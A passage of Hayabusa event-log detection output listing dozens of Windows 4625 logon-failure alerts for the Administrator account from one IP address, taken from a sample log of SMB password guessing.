Password,User: Administrator | Type: 3 | Computer: PkeEabFrDLsBVcXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GH7dTevmTKZo46Tq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l2E8JmrfaCj5AjSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.091 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N4FLUvawWPVqdLaD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.136 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KN0EeUzxSZy5l7J4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.169 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8FjH0QHqromIYWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.217 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fhlF37S1wNupiX5O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.262 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j19XhmSXK526I8kf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.297 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IRcppJXDNNfKuvdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.343 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0FoGAIAK2FV3zCJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.393 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uYWIk76XIksgN3sE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.444 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3FEop7o3SOolNvKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMGEM3ql9uov7zCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.520 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EFPUA4pUPaLrkr1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.551 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7IeJU89jxitz407 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.590 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wqj9nXRaDpwCJZO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.631 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bl0d61v2Ux7cNv4r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.663 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LxTa5lyutrIB2cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.684 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPCy11e3YxcCloSH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mj07WKc4aQqPC0Te | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2M3v4TsQul5R4sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I67uBcH52tgLzhVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.835 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hsth68FDJ4F10H6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.929 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDoHrfWlaWZ5GbWV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.972 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uliC5Wd7uZR3fIBc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: Xhg4hg4XDFaXsJRe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.042 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: ZrSGxwUyV6gCUPeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.179 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUBgTr05x3djEYdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.219 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 40PhGU4ZXu7uihop | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.335 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1DJ9r72hXZH9rEkb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.397 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: khy2BeyBb9wq00f7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.462 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1cDckicL7IMrO7OQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.513 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEEkvfVd3FCap6fa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.545 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGFSyHQ0ZNWofxzE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItOZqZSDTrdWpkbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.611 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhNdf5lHfrHKSCXq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.646 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg05F6tdf3kR9kdP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.693 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 70rRbaC6L6SzT15q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.735 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnJyN8wF21ff2L1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.769 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MUZHZJMQznj6GBqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.804 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9h52ZKMbXLuFvUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.839 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n95RJvcQnFrAG2iX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.883 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xI23nmysFlr1pvVf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.916 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nVsjcTxDdZbzkmMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.955 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMuWatQuNBh9UKdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.992 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfC3JZ3awqFDNQbm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.028 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 337h8PHN6Axi0iaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.071 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qGQpWOuzgETfxTgJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.108 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oFjlyMAJMI2zIC8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.144 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7exAVz3PlzJQ6Wcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.183 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RuYihjQpt76foAW3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.219 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlPm2vRh9EHN9J6n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.255 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n9jDy3NDDPe7XgyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.291 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtGxqEKOoP6W3w0Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BLqYztXwV80UBez1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0yki1dEFZrnMLs2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jbE2z1W1wQgoTDso | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.455 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJmZFXFxiLuWWkMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.500 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x9EPwprgXSJNUFfg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h0ZjYxZ8K5m5F1vo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.587 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xSw7OjDv8ldqbm5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.631 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mk0BAdOI210HwPhX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.686 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSwWz57Kvl2XJVUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DLcfSrHT5bSsNnuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQDkbESps0PXWEUT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.797 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpnyzkXasuyAtdn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.840 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ps9IqJzTliJvzpIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.876 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V7PLb2uRTIY8t123 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.921 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sHAJ9p0QbSRxhvtk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.968 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YRiE1wGrwWAx0feP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Flo4bCVjmlaHz0QS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.061 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HscUujSzd3Ua7dqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aIQPTx67aEer51wb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.191 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MqUoXUf7PKIaoDjs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.222 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzeB4DAS1W633tmh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.263 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTtXTrqHoCZMbDLT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.311 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4HVv5PgPhiDW3qcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g21VoO45UrIbTuZO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.383 